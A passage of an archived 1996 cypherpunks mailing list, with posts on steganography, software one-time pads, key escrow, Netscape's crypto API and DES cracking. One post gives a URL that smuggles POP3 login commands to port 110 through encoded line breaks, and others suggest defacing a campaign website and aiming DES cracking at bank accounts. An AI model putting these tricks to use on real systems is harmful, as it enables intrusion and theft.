It seems the early phases of a compiler build the symbol table as a tree
and do various bits of analysis on the source.  A good starting point for
a program might be a compiler - rip out the translation and optimisation
phases and add the stegoreader and stegogenerator.


KEYED V. UNKEYED STEGO

Assuming that the data hidden in stegofiles is random (keys or cyphertext)
the enemy is supposed to be unable to tell whether there is really a message
there.  An example of unkeyed stego is the use of LSB of each byte in an image
or audio file.  In contrast, the subliminal channel mechanisms written about by
Schneier use a key known to the intended reader.  In this application keyed
stego would seem to have an advantage over unkeyed in that the source could be
made to keep to a house style while retaining some stego capacity.  The seeds
for the CRCs and style info (resembling ./indent.pro ~/indent.pro) could be
user-defined.  I'd still wouldn't want to hide plaintext under it, but it
would give more flexibilty for the users.


Would anyone like to write a version ? Then we could test my guesses
about how many bits can be hidden.  It probably won't be close to 
1 in 8, but I think 1 in 30 should be within reach.




 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (Psuedo Nym)
Date: Thu, 17 Oct 1996 21:55:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NOISE] About piracy & key recovery / hacked pages & Clinton-Gore
Message-ID: <19961017.191917.7959.0.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmmm... let's see... At about the same time
I see people talking about major software/hardware
companies going into the key recovery biz and
piracy sites _not_ getting taken off of servers (SPA).
Piracy. Software companies. Don't they have a
common bond somewhere? Wouldn't it be ironic
if a rash of piracy occurred with said companies
products being pirated?
I also noticed two other parallels: Hacked web pages
and (although not here) the Clinton/Gore re-election.
Hmm... Didn't somebody say something about
the real Dole page getting a lot of hits? Maybe the
Clinton page gets a lot of hits too. Wouldn't that be a
hoot if somebody hacked their page and changed it
to something more meaningful, say, how they are
pushing the terribly dangerous key-recovery project.
Even a subtle hack, such as putting a link to national
and international sites carrying PGP, would have an
effect.
In the true spirit of the subject, I am not responsible.
err...
I am not responsible if this happens.
Food for thought/no need to reply.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 17 Oct 1996 16:27:07 -0700 (PDT)
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Q.E.D.
In-Reply-To: <Pine.BSI.3.95.961016194535.21030B-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.94.961017191051.8707B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996, IPG Sales wrote:

> 
>          Some of you have sardonically written to say "Nihil Est
>          Demonstrandum," N.E.D. because an OTP must be derived from a
>          hardware source, that is, it must be a pure random sequence
>          of limitless entropy. Accordingly, they unbashfully assert
>          that an OTP generated by a computer program is not possible.
> 
>          How do they know that? Does the Bible tell them so, or the
>          Koran, or do they get it from the Torah? Why not cite the
>          source of their certainty instead of advancing an unsupported
>          proposition.  I do not mean to be rude, but excuse me, what
>          scientific proof can they offer for that immovable avowal?

Show me the scientific proof that a monkey cannot write a bestselling
novel in 100 minutes.  Of course you can't.  This is called "proving a
negative."

The fact that this little nuance has escaped you does not bode well for
your software generated OTP scheme or, indeed, your general intelligence.

>          There is no scientific proof whatsoever, none at all, except
>          for the words and their steadfast, and maybe self serving,
>          postulate.  Accordingly, obviously it is they, not us, who are
>          the ones that have "Nihil Est Demonstrandum," in this matter.
>          There is not one scintilla of sustainable evidence to support
>          such a doctrine.

Ok, what scientific proof exists that a truely random number generator can
be software based?  There is not one scintilla of sustainable evidence to
support this concept either.

>          While the vast majority of people knowledgeable about
>          cryptography have not heretofore believed that it is possible
>          for software to produce an OTP, that does not make it a
>          scientific fact, but merely means it is the consensus of
>          scientific opinion that it is not possible. With all due
>          respect to Bruce, and his exceptional work, Paul, Roy and many 
>          others who obviously know the subject matter of which we speak, I
>          offer that  history is replete with scientists supplying proof of
>          the seemingly impossible.

Ok, here comes the part where you tell us that you are the Einstein of
cryptography and will prove all the experts wrong?  "They laughed at me at
the institute, but I will show them!"  (In this case they laughed at you
because you are an idiot, not because they were shallow minded.

>          In support of their position, some have pointed out that John
>          von Neumann, to paraphrase, stated that ARITHMETIC cannot
>          produce random numbers, a thesis which I agree with; but
>          where is that, in any way inconsistent with IPG's position on
>          EUREKA?  IPG has produced a system to generate software OTPs,
>          albeit it within limited but but more than ample entropy, not
>          software random numbers.

Yadda, yadda, yadda.  Does your software not use arithmetic?

>          We stipulate the obvious fact that the encryptor stream
>          generated by EUREKA is a PRNG stream, though we do consider
>          it gross denigration to castigate it as ONLY a PRNG stream.
>          It is a PRNG issue that also happens to be an extremely well
>          behaved OTP sequence, with limited but ample entropy, as well.
>          It meets each and every criteria rationally established for an
>          OTP in all reasonable aspects. Subjected to any and all
>          statistical analyses, the EUREKA PRNG stream manifests itself as
>          being random, though we know, as a scientific fact, that it is
>          not.

All of the above is substanceless hype.  Why, exactly, are you telling us?
Clearly none of us are going to buy your product.  I suggest trying to get
the FTC procurments section to purchase EUREKA in bulk for their own use.

>          To substantiate that posit, and unlike the consensus of
>          scientific opinion, obviously N.E.D., that believes that
>          software cannot produce an OTP, IPG offers "Quod Erat
>          Demonstrandum," Q.E.D. scientific proof that we can produce
>          a humungous number of software OTPs sufficient to meet any and
>          all current or future requirements.

"Captain, the phase dampener has overrided the antimatter flux capicator.
I think I can pin it down with a phased neutreno pulse if I isolate the
presence of diocrastic radiation."

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 17 Oct 1996 19:22:47 -0700 (PDT)
To: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Subject: Re: Binding cryptography - a fraud-detectible alternative to key-esc
Message-ID: <199610180222.TAA16263@netcomsv.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I haven't seen the technical papers behind the postings you've made
to the net, but the overall approach sounds very similar to "Clipper II",
the Software Key Encryption work that the TIS people (Steve Walker?) and
Dorothy Denning were touting a year or so ago.  It wasn't in your references,
and it's clearly close enough to be worth your attention.  The design was
interesting -
it chose a set of public and symmetric key encryption that allows the recipient
to validate the sessionkey-encrypted-to-key-copy-holder*.

A not-highly-technical description of the TIS CKE Commercial Key Escrow
system is at http://www.tis.com/docs/products/cke/present.html,
particularly present9b.html.  It's worth reading for the appalling graphics
alone :-)  I don't seem to have a copy of the technical description anywhere.
<IMG href="http://www.tis.com/docs/products/cke/pres7a.gif">

A major capability that was missing from Walker's SKE work is the ability
to split the copied* key into two or more parts, all of which are need to
recover the session key, while making it possible to validate that the
pieces do add up to the session key.  (This was also missing from the Clipper
chip in hardware, which pretended to do it in the master key setting process.) 
Can you extend the approaches you're using to allow an outside party,
or at least the recipient, to validate that the two parts of the copied key
contain the complete session key? 


[* I'm using the terms "copied key" and "Key copy holder" to refer to the
copy of the key that you're giving to some third party and the third party.
The term "escrow" is generally not applicable to the applications that
transmit a copy of the key to some third party, and the technologies
involved don't specify, communicate, or enforce conditions for access.
TIS's CKE does at least cart around a 32-bit user-defined string for specifying
recovery conditions, but there's not technical enforcement.  ]

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Mon, 21 Oct 1996 07:06:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: European Commission on "Illegal and harmful content on the Internet"
Message-ID: <$m2n6813-.0NrZy4B4GDiQ089yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

A recently released European Commission Communication on "Illegal
and harmful content on the Internet" may prefigure the nature of
coming European Union regulatory initiatives concerning the net.
This Communication was in response to a 27 September resolution
by the Telecommunication Council on "preventing the dissemination
of illegal content on the Internet, in particular child
pornography." The document reportedly reflects what will be
ongoing work to "present practical measures in time for the next
Telecommunications Council on 28 November 1996."

The Communication describes its aims as:

firstly to describe briefly the different types of illegal and
harmful content,

secondly to examine the technical context in which action can be
taken to deal with illegal and harmful content,

and finally to suggest a number of practical measures designed to
be rapidly implemented

Among the points of interest, it states with emphasis that
"additional international cooperation is required to avoid 'safe
havens' for documents contrary to general rules of criminal law."
With respect to anonymous communications it discusses proposed
"measures to close known loopholes and improve traceability and
that anonymous remailers record details of identity."

As is typical of these agendas, the devil will be in the evolving
details of enforcement. It looks like 1997 will be a busy year
for proponents of greater state control over internet content
both here and abroad. If they can conjure up enough sufficiently
compelling bogeymen, it could be a very successful one for them
as well.

The HTML version of this document can be found at:

<http://www2.echo.lu/legal/en/internet/content/communic.html>

Links to RTF and Word versions along with the accompanying press
release and related documents can be found at:

<http://www2.echo.lu/legal/internet/html>

- -Michael



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850

iQCVAwUBMmaw0tGJlWF+GPx9AQGMLgP+JC5Lyd0NZDukq8AWipUNcDUgb6m16iUN
3smYcPdPYvsUDSWznx7ZQsklQV0oz9u5Ru7s8VoOQfA2wqSoiai3LiUiJg5WkfOg
HTAbvVQCeoUaRmkmmbFJSzfqVzGB4VkJRCE4htPmmqYhCwwmMjooTi3bAClySGTD
7YcLjv0pC5w=
=4EZY
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal@rain.org (Hal Finney)
Date: Mon, 21 Oct 1996 07:04:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Anonymous Auth Certificates [was: Re: Blinded Identities]
Message-ID: <$m2n6818-.199610172233.PAA01850@crypt>
MIME-Version: 1.0
Content-Type: text/plain


From: Carl Ellison <cme@acm.org>
> >> >Steve Shear <azur@netcom.com> writes:
> >
> >[much cut]
> >>
> >> I've been charged with developing an Internet service which needs to assure
> >> its clients of anonymity.  However, we fear some clients may abuse the
> >> service and we wish to prevent the abusers from re-enrollment if
> >> terminated for misbehavior. (In your example, it would be the person(s)
> >> trying to discover the service host via flood).
> >>
> >> My thought was to base enrollment on some sort of 'blinding' of their
> >> certified signature (e.g., from Verisign) which produces a unique result
> >> for each signature but prevents the service from reconstructing the
> >> signature itself (and thereby reveal the client's identity).  I'm calling
> >> this negative authentication.
>
> The mistake is to think of using ID certificates (like those from Verisign)
> in the first place.  They don't mean anything.
>
> You want an authorization certificate, such as produced by SPKI.  You need
> to know what a key is authorized to do, not what name is associated with
> the key.

(Sorry about quoting so much, but I liked Steve Shear's succinct problem
statement.)

I don't see how authorization certificates solve this problem.  How
would you determine if someone was qualified to receive an authorization
certificate?  And what would you do to make them stop using the service
if they abuse it, and to stop them from getting new authorization
certificates?

Thanks,
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 17 Oct 1996 17:58:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Netscape Show - Security API
Message-ID: <Pine.SUN.3.91.961017203037.10811A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


I was at the Netscape show and attended the Security API.  Looks pretty 
impresive.  The slides for this should be available a week from now on 
www.develop.netscape.com (?) for those interested.

This will be available in Netscape 4.0

Everything is a plug in module, and you can even replace the crappy DES 
and crippled RSA mods with stronger ones and even write a PGP signature 
checker/signed/encryptor, etc for both server and browser.  Very cool 
stuff. PGP was actually mentioned!

Catch is this: the international version is again crippled, however it is 
interesting to note that they got a module loadable crypto API to pass 
ITAR.  They did this by having the international versions check modules 
for signatures that say "US Export Allowed" :)

Possibilities around this (not that I am advocating any, just restating
what was said): export the USA version (of course breaking the ITAR),
modifying the code that checks the signature and allow it to load any
module, making a DIFF file between versions and exporting that (would this
be legal?)

They mentioned (someone asked) that the signature authentification 
methods that check a module are part of the same API, but hinted that 
they couldn't be overridden.  This could of course be tested, and 
hopefully they can be disabled. :)  But time will tell.

There was also some talk of expiring signatures - not sure if it was 
regarding modules or mail or key certificates.  If module signatures 
expire every six months that would make an interesting situation.

In the USA, you can write any module to do anything!  Would be cool to 
have a Netscape Mail PGP set of modules!!!  This could indeed solve the 
problem of having software that's secure and yet also easy to use.

What sucks is that someone in England couldn't write their own plug in 
modules to get better crypto for use in the international versions.  
Perfectly legal in the point of view of international laws and ITAR, but 
crippled!  Netscape says they won't sign non-USA produced crypto modules 
for the international versions -- or at least that was the message they gave.
The folks at Netscape said that the US Government (NSA wasn't mentioned) 
did not want the situation to exist that someone from outside could build 
stronger crypto and have it be imported to the USA... 

Looks like we have an Iron (Crypto) Curtain situation here.  In the end
the USA suffers since we are only one country, but I won't start ranting
on that here since it's been discussed to death already. :)

Several folks from outside the USA, one guy from England actually did 
express concerns at this problem.


Some of the authentification methods they were showing were smart cards 
and such, and one of the comapnies there was giving eval models out!

Litronic had a couple of models - one a serial port one (9600 only with 
512 bit RSA, also 768 bit, 1024 bit models will be due out in mid '97) 
the other plugs right into the keyboard grabbing your keystrokes before 
they reach the application! If you need eval models for your company to 
do development call'em at 714-545-6649 or go to contact them at 
litronic.com, whatever. :)  

The serial port model is likely to be the most useful since it (should?) 
work on PC's (Running Linux too!), Suns, Macs, and even C64's. :)  Not 
sure if the API for this is software or an RS232 protocol, if the latter, 
these will work with pretty much anything.

Not sure how trustworthy they are, after all you can't disassemble the
smart cards and check their properties to make sure there are no holes,
but possibly a dual method would work.  That is, send a message to the
card, have it sign or encrypt the message with the private key, take that
signature/encrypted message, and also ask the user to type in a second
passphrase (or use the same hashed differently) that's handled on the
local machine.  If the user has both, even if the card is crippled, you
are secure, and even if someone finds the card they won't be able to use 
it. (I won't go into rubber hose key recovery here or any other details, 
see Tim C. May's excellent Cyphernomicon if you need background info on 
that.)

Over all, the message I got from this is that Netscape is doing the right 
thing, they are for strong crypto - but are forced to abide by the 
ITARs.  They are for voluntary key escrow for companies, NOT mandatory 
key escrow.  They'd like to provide strong crypto functionality to all 
and would if not for the ITARs.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "! Drive" <drink@aa.net>
Date: Thu, 17 Oct 1996 21:11:42 -0700 (PDT)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Production of ALPHACIPHER for Windows 95 and DOS Cancelled!
Message-ID: <199610180358.UAA07899@big.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


This may have already been posted, but I found it interesting...

from: http://www.aa.net/cyber-survival-hq/

     Development of the ALPHACIPHER product line has been voluntarily cancelled
due to the possibility of
                 non-compliance of users of ALPHACIPHER with the new key escrow
law.

   Every key created by a user that would encrypt messages for international
correspondence would have to be
  registered with the US Government. Cyber-Survival-HQ cannot insure that the
users of ALPHACIPHER would
     voluntarily comply with this new law, and so ALPHACIPHER is hereby
withdrawn from the marketplace.

        ALPHACIPHER currently has no built-in key generation function, and the
proposed release of an
 ALPHACIPHER key generator has been terminated. All purchasers of ALPHACIPHER
are entitled to a complete
                               refund, and this has already been done.

         The New ADFGVX cipher is still offered for sale, as it is a breakable
cipher, at least in theory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 19:00:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Goodbye
In-Reply-To: <199610171444.HAA07281@dns1.noc.best.net>
Message-ID: <o11yVD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> writes:

> Goodbye

John Gilmore has asked me not to say "good riddance", and so I don't.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 19:00:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: YES OR NO?
In-Reply-To: <Pine.SUN.3.91.961017141221.18637E-100000@crl.crl.com>
Message-ID: <FL2yVD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
> C'punks,
>
> On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > I said: YES, when I have the time.
>
> Great.  So let's pick a date sufficiently in the future that you
> can make a firm commitment.  For starters, our three winter
> meetings are tentatively scheduled for December 14, January 11
> and February 8.  Any of those sound good to you?

Don't know yet.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Thu, 17 Oct 1996 19:13:30 -0700 (PDT)
To: cypherpunks mailing list <cypherpunks@toad.com>
Subject: [NOISE::SECURITY] Disabled ports in Navigator
Message-ID: <3.0b36.32.19961017221127.00691b88@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


I was thinking about how to fix a sendmail program for our server when the
(most likely unoriginal) thought cam to me:  why not use your web broser as
a telnet tool?  You could embed CRLFs into the request field and the
receiving program would just throw the GET /[etc] out like I messed up or
something.  I could then add subsequent logins & commands to my heart's
content (or the string length of that particular browser's request field).
Being behind a firewall, I tend to think of these things. The only problem
would be with the fact that no EOL is ever sent, but with a good browser
that displays as content is streamed, you wouldn't have to worry about that.

Like I said, I doubt it's original because when I tried to do it in
Navigator I get a

Sorry, Access to the port number given has been disabled for security reasons.

error dialog.  I got this for all of the obvious ports (21,25,110, etc).

I only have 3.0 on my machine, so I don't know if it works with previous
versions.  MSIE3 doesn't disable the ports, but it doesn't start displaying
anything (it suffers from the stupidity of not displaying as it streams).

Has anyone else personally tried this?  My original idea was to see my home
email, with something like:

http://mail.here.com:110/user%20me%0D%0Apass [... etc]

Any comments, suggestions, etc?


Rick Osborne / C++ VB Pascal HTML VRML Java / osborne@gateway.grumman.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The NSA is now funding research not only in cryptography, but in all
areas of advanced mathematics. If you'd like a circular describing these
new research opportunities, just pick up your phone, call your mother,
and ask for one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 17 Oct 1996 22:06:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Production of ALPHACIPHER Snake Oil Cancelled!
In-Reply-To: <199610180358.UAA07899@big.aa.net>
Message-ID: <v03007805ae8cd05a889d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:11 PM -0700 10/17/96, ! Drive wrote:
>This may have already been posted, but I found it interesting...
>
>from: http://www.aa.net/cyber-survival-hq/
>
>     Development of the ALPHACIPHER product line has been voluntarily
>cancelled
>due to the possibility of
>                 non-compliance of users of ALPHACIPHER with the new key
>escrow
>law.


And just which _law_ might that be? Care to name an Act? Or even a Bill?

Come to think of it, just what the hell is "Alphacipher," and why should we
care?


>        ALPHACIPHER currently has no built-in key generation function, and the
>proposed release of an
> ALPHACIPHER key generator has been terminated. All purchasers of ALPHACIPHER
>are entitled to a complete
>                               refund, and this has already been done.

Were there any actual purchasers?

>         The New ADFGVX cipher is still offered for sale, as it is a breakable
>cipher, at least in theory.

Ah, yes, now I understand. Sounds like just a new marketing ploy for the
same old snake oil.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 17 Oct 1996 19:17:51 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: YES OR NO?
In-Reply-To: <B5JyVD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961017221654.10811I-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> 
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >                           SANDY SANDFORT
> >  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> > 
> > C'punks,
> > 
> > On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> > 
> > > It is a great honor to meet a net.legent in person.
> > 
> > I hope Dimitri will stop hidding behind his computer and "honor" 
> > us with his presence at an SF Bay area Cypherpunks meeting.  I've 
> > got pledges for nearly $1200 to bring him out here to speak.  All
> > we need now is a serious response from Dimitri.  I guess when the
> > going gets tough, the "net legends" get yellow.  What are you 
> > afraid of Dimitri?
> 
> I said: YES, when I have the time.

Translation: "Uh, I can't see you Friday, I have to give my parakeet a 
bubble bath and have beak sex with afterwards, yeah, uh, that's it."

2nd Translation "I'm a chicken in real life, and have no balls so I will 
postpone this until hell freezes over.  Meanwhile I'll create another 
diversion by posting a thousand more anti Tim May messages to take the 
heat off."


=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 17 Oct 1996 22:38:32 -0700 (PDT)
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: DES cracker.
In-Reply-To: <3.0b36.32.19961018003632.00699af0@mail.pb.net>
Message-ID: <Pine.3.89.9610172224.A7082-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 18 Oct 1996, Geoffrey C. Grabow wrote:
> Tell me what you need.  A large part of my job is providing hardware
> security modules to banks to secure (among other things) their ATM networks
> (Automated Teller MAchines, not Async Transfer Mode).  Do you need PIN
> encryption formats, transmission message protocols, or what?  Just LMK.

It would be best to attack something that has broader use than just a 
single pin. At best, that would allow an hostile to clean out a single 
account. A target that would allow one to attack, say an account held 
*by* a bank would be more attractive.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 17 Oct 1996 22:32:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: DES cracker.
In-Reply-To: <3.0b36.32.19961018003632.00699af0@mail.pb.net>
Message-ID: <v03007806ae8cd5a0c5b5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



(I've deleted 7 out of the 8 recipients, including 2 of the 3 mailing
lists. Aren't we letting cross-posting get a bit out of hand?)

At 12:36 AM -0400 10/18/96, Geoffrey C. Grabow wrote:

>Tell me what you need.  A large part of my job is providing hardware
>security modules to banks to secure (among other things) their ATM networks
>(Automated Teller MAchines, not Async Transfer Mode).  Do you need PIN
>encryption formats, transmission message protocols, or what?  Just LMK.

Wow! If we could get you to get all the ATM terminals to contribute spare
CPU cycles to DES-busting, this'd be really great!

I doubt customers would mind having to wait an extra second or two while
the ATM finishes whatever it's doing. (And maybe if the DES bust is
successful while a customer is waiting, he could be awarded with an extra
$20 bill.)

Better than a DES-busting screensaver.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 18 Oct 1996 00:05:02 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Re: NAVAHO
In-Reply-To: <v02130504ae8bddd2ae79@[10.0.2.15]>
Message-ID: <326722A3.4DFD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear wrote:
> As most all on this list are aware, the U.S. Army made frequent and
> successful use of our indigenous people (often Navaho) for battle
> field communications during WW II.  Now obviously Navaho is a widely
> recognized language and even our 'oppressive" government wouldn't dare
> tell such speakers, who might be under investigation for some alledged
> criminal activity, that were engaging in international communications
> that they could not use this or a similar form of communciation
> because LE might not be able to interpret its meaning.

Well, sad to say, a lot of Navajos are being used as intermediaries for 
"black-ops" projects.  It's the sovereignty scam (used when it's useful 
to them), like British subjects intercepting U.S. phone calls, etc.

> What would be the legal status of communicating with a language, too
> complex for easy human use, which required a computer to structure and
> translate between other human languages?  What would be the ITAR
> implication of exporting such linguistic software?

You're getting close to something.  There's going to have to be a 
definition of intent for international (and eventually domestic) audio 
communications, to establish the originator's intent, even ignoring 
stego issues.

> What about speaking or writing riddles or other 'indirect' coding in
> which the true meaning of spoken or written communication is other
> than the appearent (literature, especially mysteries have them)?
> Could export of software designed to create/interpret such riddles or
> 'hidden' meanings come under ITAR regulation?

If they're not careful, they could open up a juicy can of worms.  For 
example, when the L.A. Times ran a recent headline to the effect that 
areas around China were becoming a hotbed of weapons dealing and so on, 
you could interpret that (if you're paying attention) as an invitation 
to weapons dealers and buyers to "come and get it while it's hot".

Look at the time lines for getting secure crypto into the hands of the 
more-or-less average person, then imagine a much shorter time line for 
the spinoff programs that do these specialized tasks. Short time lines 
don't give bureaucrats much time to work with, so if such programs get 
into wide use, the govt. will have to generalize the prohibitions more 
than they've announced so far.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 17 Oct 1996 23:42:57 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <sandfort@crl.com>
Subject: Re: More threats from FOTM (Friends of Timmy May)
Message-ID: <19961018064144062.AAA75@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 15 Oct 1996 21:54:20 -0700 (PDT), Sandy Sandfort wrote:

>Does anyone remember the Russian word for "uncultured"?  It was
>in one or two of Tom Clancy's books.

nekulturny?  

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 17 Oct 1996 23:47:46 -0700 (PDT)
To: "Brad Shantz" <tcmay@got.net>
Subject: Re: Microsoft Millionaires and Billionaires
Message-ID: <19961018064633093.AAA187@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996 07:54:06 -0700 (PDT), Brad Shantz wrote:

>You obviously don't know as many developers at Microsoft as I do.   They 
>treat alot of their developers like farm animals.  I just had an interview 
>at Microsoft last week.  Very few if any of the people I met with were 
>millionaires.

I've heard a lot of people say that the 5+ year Microsquishies are leaving in
droves because 'it's not a fun place to work anymore'.   The pain of success,
I guess.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 18 Oct 1996 00:04:56 -0700 (PDT)
To: Bert-Jaap Koops <E.J.Koops@kub.nl>
Subject: Re: Comments on binding cryptography (1)
